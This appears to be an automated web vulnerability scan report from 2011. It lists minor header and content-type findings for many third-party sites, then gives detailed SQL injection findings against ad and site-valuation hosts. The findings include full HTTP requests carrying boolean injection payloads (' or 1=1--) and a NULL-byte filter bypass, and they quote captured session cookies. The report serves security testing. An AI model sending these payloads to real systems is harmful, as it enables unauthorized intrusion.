33.10. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

33.11. http://pixel.invitemedia.com/data_sync

33.12. http://tags.bluekai.com/site/3945

33.13. http://tomopop.com/index-ad-anime.phtml

33.14. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

33.15. http://www.100grandinstantwin.com/favicon.ico

33.16. http://www.2hairy.com/favicon.ico

33.17. http://www.92kqrs.com/favicon.ico

33.18. http://www.ahima.org/favicon.ico

33.19. http://www.allsup.com/favicon.ico

33.20. http://www.amateurathome.net/favicon.ico

33.21. http://www.argosy.edu/favicon.ico

33.22. http://www.babynameshub.com/favicon.ico

33.23. http://www.benchmade.com/favicon.ico

33.24. http://www.bitstatement.net/favicon.ico

33.25. http://www.blackintrusion.com/favicon.ico

33.26. http://www.clipsguide.com/favicon.ico

33.27. http://www.coolquiz.com/favicon.ico

33.28. http://www.cramster.com/favicon.ico

33.29. http://www.crankyape.com/crankyape_logo.gif

33.30. http://www.cricbuzz.com/favicon.ico

33.31. http://www.cyberhomes.com/favicon.ico

33.32. http://www.dailynewnowa.com/favicon.ico

33.33. http://www.dermnet.com/favicon.ico

33.34. http://www.diskeeper.com/favicon.ico

33.35. http://www.earthfare.com/favicon.ico

33.36. http://www.easyearnsurveys.com/favicon.ico

33.37. http://www.expresstoll.com/favicon.ico

33.38. http://www.female-anatomy.net/favicon.ico

33.39. http://www.flashymodels.com/favicon.ico

33.40. http://www.forrabbits.eu/favicon.ico

33.41. http://www.freegroceriesdirectory.com/favicon.ico

33.42. http://www.giftcertificatedelivery.com/favicon.ico

33.43. http://www.govacuum.com/favicon.ico

33.44. http://www.gpwa.org/favicon.ico

33.45. http://www.hairyfilm.com/favicon.ico

33.46. http://www.hairygirlspussies.com/favicon.ico

33.47. http://www.hsj.org/favicon.ico

33.48. http://www.ibegin.com/weather/weather_widget.php

33.49. http://www.inmates-searches.com/favicon.ico

33.50. http://www.insites.eu/favicon.ico

33.51. http://www.japanator.com/elephant/index_cblogs-mini.phtml

33.52. http://www.japanator.com/elephant/login.phtml

33.53. http://www.japanator.com/elephant/signup.phtml

33.54. http://www.kieronwilliamson.com/favicon.ico

33.55. http://www.laptoptracking.net/favicon.ico

33.56. http://www.laterooms.com/favicon.ico

33.57. http://www.leagle.com/favicon.ico

33.58. http://www.lee.net/favicon.ico

33.59. http://www.mecum.com/favicon.ico

33.60. http://www.myfavoritegames.com/favicon.ico

33.61. http://www.mylearningplan.com/favicon.ico

33.62. http://www.myrtlebeach-resorts.com/favicon.ico

33.63. http://www.nfcc.org/favicon.ico

33.64. http://www.noonetube.com/favicon.ico

33.65. http://www.nylaarp.com/favicon.ico

33.66. http://www.onlinemicrofiche.com/

33.67. http://www.onlinemoneystash.com/favicon.ico

33.68. http://www.oshkosh365.org/favicon.ico

33.69. http://www.phonedelivery4g.com/favicon.ico

33.70. http://www.picindividuals.com/favicon.ico

33.71. http://www.recon.com/favicon.ico

33.72. http://www.redirectgame.com/favicon.ico

33.73. http://www.right-ads.com/favicon.ico

33.74. http://www.righttoworkfoundation.org/favicon.ico

33.75. http://www.ronniesmailorder.com/fiche_select1.asp

33.76. http://www.ronniesmailorder.com/testimonials_display.asp

33.77. http://www.rustoleum.com/favicon.ico

33.78. http://www.snapfinger.com/favicon.ico

33.79. http://www.str8boyzseduced.com/favicon.ico

33.80. http://www.tacklewarehouse.com/favicon.ico

33.81. http://www.techonlife.com/favicon.ico

33.82. http://www.tenniswarehouse.com/favicon.ico

33.83. http://www.termite.com/favicon.ico

33.84. http://www.tube555.com/favicon.ico

33.85. http://www.tubespecials.com/favicon.ico

33.86. http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm

33.87. http://www.weddings.com/favicon.ico

33.88. http://www.wheelfire.com/favicon.ico

33.89. http://www.womenolder.net/favicon.ico

33.90. http://www.wtuber.com/favicon.ico

33.91. http://www.wyeke.com/favicon.ico

33.92. http://www.yoplait.com/favicon.ico

34. HTML uses unrecognised charset

34.1. http://www.animeyoung.com/favicon.ico

34.2. http://www.mktginc.com/favicon.ico

34.3. http://www.swoopo.com/favicon.ico

34.4. http://www.washingtonpost.com/wl/jobs/home

35. Content type incorrectly stated

35.1. http://bdv.bidvertiser.com/BidVertiser.dbm

35.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

35.3. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848

35.4. http://csrc.nist.gov/favicon.ico

35.5. http://j.maxmind.com/app/geoip.js

35.6. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg

35.7. http://v6test.cdn.att.net/special.jpg

35.8. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

35.9. http://www.92kqrs.com/favicon.ico

35.10. http://www.ahima.org/favicon.ico

35.11. http://www.allsup.com/favicon.ico

35.12. http://www.babynameshub.com/favicon.ico

35.13. http://www.benchmade.com/favicon.ico

35.14. http://www.calastrology.com/favicon.ico

35.15. http://www.campingsurvival.com/favicon.ico

35.16. http://www.cramster.com/favicon.ico

35.17. http://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

35.18. https://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

35.19. https://www.crankyape.com/images/AuctionImages/thumb.26361.2.jpg

35.20. https://www.crankyape.com/images/AuctionImages/thumb.26361.3.jpg

35.21. https://www.crankyape.com/images/AuctionImages/thumb.26361.4.jpg

35.22. http://www.cyberhomes.com/favicon.ico

35.23. http://www.dermnet.com/favicon.ico

35.24. http://www.developer.com/favicon.ico

35.25. http://www.diskeeper.com/favicon.ico

35.26. http://www.earthfare.com/favicon.ico

35.27. http://www.fastpictureviewer.com/favicon.ico

35.28. http://www.freegroceriesdirectory.com/favicon.ico

35.29. http://www.goodtoknow.co.uk/favicon.ico

35.30. http://www.google.com/uds/Gfeeds

35.31. http://www.govacuum.com/favicon.ico

35.32. http://www.gpwa.org/favicon.ico

35.33. http://www.greenhulk.net/forums/customavatars/avatar21634_4.gif

35.34. http://www.greenhulk.net/forums/customavatars/avatar27186_2.gif

35.35. http://www.greenhulk.net/forums/customavatars/avatar3537_6.gif

35.36. http://www.greenhulk.net/forums/customavatars/avatar9792_2.gif

35.37. http://www.healthination.com/favicon.ico

35.38. http://www.highcharts.com/highslide/graphics/zoomout.cur

35.39. http://www.hsj.org/favicon.ico

35.40. http://www.ibegin.com/weather/weather_widget.php

35.41. http://www.inmates-searches.com/favicon.ico

35.42. http://www.insites.eu/favicon.ico

35.43. http://www.keds.com/favicon.ico

35.44. http://www.laterooms.com/favicon.ico

35.45. http://www.leagle.com/favicon.ico

35.46. http://www.mecum.com/favicon.ico

35.47. http://www.myfavoritegames.com/favicon.ico

35.48. http://www.newswiretoday.com/favicon.ico

35.49. http://www.nfcc.org/favicon.ico

35.50. http://www.nylaarp.com/favicon.ico

35.51. http://www.picindividuals.com/favicon.ico

35.52. http://www.recon.com/favicon.ico

35.53. http://www.redirectgame.com/favicon.ico

35.54. http://www.ronniesmailorder.com/fiche_select1.asp

35.55. http://www.ronniesmailorder.com/testimonials_display.asp

35.56. http://www.rustoleum.com/favicon.ico

35.57. http://www.seoq.com/favicon.ico

35.58. http://www.seoq.com/webstatshq/images/fav/a/l/b/505403_favicon.ico

35.59. http://www.seoq.com/webstatshq/images/fav/c/h/e/159320_favicon.ico

35.60. http://www.seoq.com/webstatshq/images/fav/def3.ico

35.61. http://www.seoq.com/webstatshq/images/fav/def5.ico

35.62. http://www.seoq.com/webstatshq/images/fav/def6.ico

35.63. http://www.seoq.com/webstatshq/images/fav/e/b/a/22_favicon.ico

35.64. http://www.seoq.com/webstatshq/images/fav/g/o/o/19_favicon.ico

35.65. http://www.seoq.com/webstatshq/images/fav/g/o/o/1_favicon.ico

35.66. http://www.seoq.com/webstatshq/images/fav/r/i/v/647810_favicon.ico

35.67. http://www.seoq.com/webstatshq/images/fav/s/p/e/648999_favicon.ico

35.68. http://www.seoq.com/webstatshq/images/fav/y/a/h/3_favicon.ico

35.69. http://www.snapfinger.com/favicon.ico

35.70. http://www.tacklewarehouse.com/favicon.ico

35.71. http://www.tenniswarehouse.com/favicon.ico

35.72. http://www.termite.com/favicon.ico

35.73. http://www.trafficspaces.net/favicon.ico

35.74. http://www.tubespecials.com/favicon.ico

35.75. http://www.wheelfire.com/favicon.ico

35.76. http://www.wyeke.com/favicon.ico

35.77. http://www.yoplait.com/favicon.ico

36. Content type is not specified

36.1. http://ad.yieldmanager.com/st

36.2. http://ads.bluelithium.com/st

36.3. http://pcm2.map.pulsemgr.com/uds/pc

36.4. http://www.bocajava.com/favicon.ico

36.5. http://www.lavalife.com/favicon.ico

36.6. http://www.ourprayer.org/favicon.ico

36.7. http://www.politicalissuestoday.com/favicon.ico

36.8. http://www.westjet.com/favicon.ico

37. SSL certificate

37.1. https://www.crankyape.com/

37.2. https://www.onlinemicrofiche.com/


1. SQL injection  next
There are 46 instances of this issue:

1.1. http://ads2.adbrite.com/v0/ad [zs parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /v0/ad?sid=1794248&zs=3330305f323530%00'&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:30 GMT
Content-Length: 0

Request 2

GET /v0/ad?sid=1794248&zs=3330305f323530%00''&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:31 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDYnbP6CRj42KrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EPiAyaMKGPjYqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:31 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:31 GMT
Set-Cookie: vsd=0@4@4dbe1567@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:31 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqlj%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:31 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:31 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:31 GMT
Content-Length: 2800

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...
1.2. http://bizinformation.co/www.onlinemicrofiche.com [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15684007'%20or%201%3d1--%20 and 15684007'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www.onlinemicrofiche.com15684007'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:12:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 545
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /www.onlinemicrofiche.com15684007' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

Request 2

GET /www.onlinemicrofiche.com15684007'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 541
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www.onlinemicrofiche.com15684007' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>
1.3. http://bizinformation.co/www.onlinemicrofiche.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11607392%20or%201%3d1--%20 and 11607392%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www.onlinemicrofiche.com?111607392%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 526
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /www.onlinemicrofiche.com
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

Request 2

GET /www.onlinemicrofiche.com?111607392%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:11:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>www.Onlinemicrofiche.com</title><meta name="description" content="Onlinemicrofiche.com has a rank of 126,950 in United States, with an estimated 42,510 monthly visitors. Click to view further details of it's valuation report. Leave a comment or review the website." /><meta property="og:site_name" content="BizInformation"/><meta property="og:title" content="Onlinemicrofiche.com" /><meta property="og:image" content="http://open.thumbshots.org/image.pxf?url=onlinemicrofiche.com" /><link rel="icon" type="image" href="http://bizinformation.com/favicon.ico"/><link href="http://bizinformation.com/css/style_sp110.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="http://bizinformation.com/css/jquery.idTabs.min.js"></script></head><body><div class="main_wrapper"><div class="main_header"><div class="header_logo"><a href="/"><img src="http://bizinformation.com/images/logo.gif" /></a></div><div class="search_div_main"><div class="input_div"><form method="post" action="/" id="check"><input type="hidden" name="action" value="fetch_statistics" /><input type="text" name="url" id="url" value="www." class="url" /></div><input class="submit" type="submit" value="Value"/></form></div><div class="header_right_part"><div class="follow_us_on"><div class="follows_clickable_image"><img border="0" src="http://bizinformation.com/images/twitter-facebook.gif" /></div></div></div></div><div class="page_middle_part_border"><div class="page_middle_part"><div class="page_left
...[SNIP]...
1.4. http://bizinformation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 96146940'%20or%201%3d1--%20 and 96146940'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico96146940'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:16:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico96146940' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico96146940'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:16:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 529
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico96146940' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
